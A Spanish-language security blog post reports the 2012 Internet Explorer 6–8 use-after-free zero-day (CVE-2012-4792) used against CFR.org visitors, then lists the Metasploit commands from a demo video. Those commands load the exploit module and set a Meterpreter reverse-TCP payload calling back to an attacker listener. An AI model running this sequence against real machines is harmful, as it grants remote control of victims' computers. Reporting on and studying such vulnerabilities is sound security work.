Se ha detectado un grave 0day en Internet Explorer versiones 6, 7 y 8. El día miércoles 26 de diciembre CFR.org ha sido víctima de un ataque mal intencionado, ataque en el cual los visitantes que usaban Internet Explorer eran infectados por un nuevo 0Day. Ya se tenia registro de esta vulnerabilidad desde el 7 de Diciembre, pero fue gracia a lo ocurrido en CFR.org que binjo, Eric Romang y FireEye han realizado unos acuciosos análisis, y desde ayer que se tiene un módulo funcional en Metasploit que explota este fallo.
Este módulo se aprovecha de un fallo que ocurre cuando el objeto CDwnBindInfo es liberado por FollowHyperlink2, pero una referencia se mantiene en CDOC. Como resultado, cuando se usa la referencia durante la recarga de la página, se puede manipular una parte de la memoria, dando paso así a poder ejecutar código arbitrario.
Les dejo un Vídeo demostrativo donde explotan el fallo con Metasploit:
use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sysinfo
getuid
Referencias:http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792
http://technet.microsoft.com/en-us/security/advisory/2794220
http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/
http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html
http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/
Video:
http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/
[+] Salu2
0 Notaciones:
Publicar un comentario